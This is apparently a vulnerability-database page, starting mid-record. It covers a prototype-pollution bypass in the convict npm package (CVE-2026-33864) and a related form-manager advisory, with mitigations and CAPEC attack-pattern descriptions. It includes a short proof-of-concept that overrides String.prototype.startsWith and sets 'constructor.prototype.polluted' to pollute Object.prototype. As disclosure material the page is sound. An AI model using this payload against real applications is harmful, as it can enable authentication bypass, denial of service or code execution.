config.set('constructor.prototype.polluted', 'yes');
console.log({}.polluted); // prints yes -> the patch is bypassed and prototype pollution occurred
Expected behavior
Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:
undefined
undefined OR throw an Error
Actual behavior
Object.prototype is polluted
This is printed on the console:
undefined
yes
Impact
This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using convict.set may be affected.
It could potentially lead to the following problems:
- Authentication bypass
- Denial of service
- Remote code execution (if polluted property is passed to sinks like eval or child_process)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.2.4"
},
"package": {
"ecosystem": "npm",
"name": "convict"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.2.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33864"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T18:55:41Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nA prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute `Object.prototype` via a crafted input using `String.prototype`. \n\n### Details\nThe vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where `startsWith()` function is used to check whether user provided input contain forbidden strings. \n\n### PoC\n#### Steps to reproduce\n1. Install latest version of convict using `npm install` or cloning from git\n2. Run the following code snippet:\n\n```javascript\nString.prototype.startsWith = () =\u003e false; \nconst convict = require(\u0027convict\u0027);\nlet obj = {};\nconst config = convict(obj);\nconsole.log({}.polluted);\nconfig.set(\u0027constructor.prototype.polluted\u0027, \u0027yes\u0027);\nconsole.log({}.polluted); // prints yes -\u003e the patch is bypassed and prototype pollution occurred\n```\n\n#### Expected behavior\nPrototype pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\n`Object.prototype` is polluted \nThis is printed on the console:\n```\nundefined \nyes\n```\n\n### Impact\nThis is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using `convict.set` may be affected.\nIt could potentially lead to the following problems:\n\n1. Authentication bypass\n2. Denial of service\n3. Remote code execution (if polluted property is passed to sinks like eval or child_process)",
"id": "GHSA-44fc-8fm5-q62h",
"modified": "2026-03-26T18:55:41Z",
"published": "2026-03-26T18:55:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mozilla/node-convict/security/advisories/GHSA-44fc-8fm5-q62h"
},
{
"type": "PACKAGE",
"url": "https://github.com/mozilla/node-convict"
},
{
"type": "WEB",
"url": "https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Convict has Prototype Pollution via startsWith() function"
}
GHSA-45VR-76FP-GMWX
Vulnerability from github – Published: 2024-07-30 21:31 – Updated: 2024-08-01 15:32Prototype pollution in allpro form-manager 0.7.4 allows attackers to run arbitrary code and cause other impacts via the functions setDefaults, mergeBranch, and Object.setObjectValue.
{
"affected": [],
"aliases": [
"CVE-2024-36572"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-30T20:15:03Z",
"severity": "CRITICAL"
},
"details": "Prototype pollution in allpro form-manager 0.7.4 allows attackers to run arbitrary code and cause other impacts via the functions setDefaults, mergeBranch, and Object.setObjectValue.",
"id": "GHSA-45vr-76fp-gmwx",
"modified": "2024-08-01T15:32:15Z",
"published": "2024-07-30T21:31:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36572"
},
{
"type": "WEB",
"url": "https://github.com/allpro/form-manager/issues/1"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/1771ab4fba733ca898b6e2463dc6ed19"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.
Mitigation
By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.
Mitigation
Strategy: Input Validation
When handling untrusted objects, validating using a schema can be used.
Mitigation
By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.
Mitigation
Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.
CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels
An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.
CAPEC-77: Manipulating User-Controlled Variables
This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.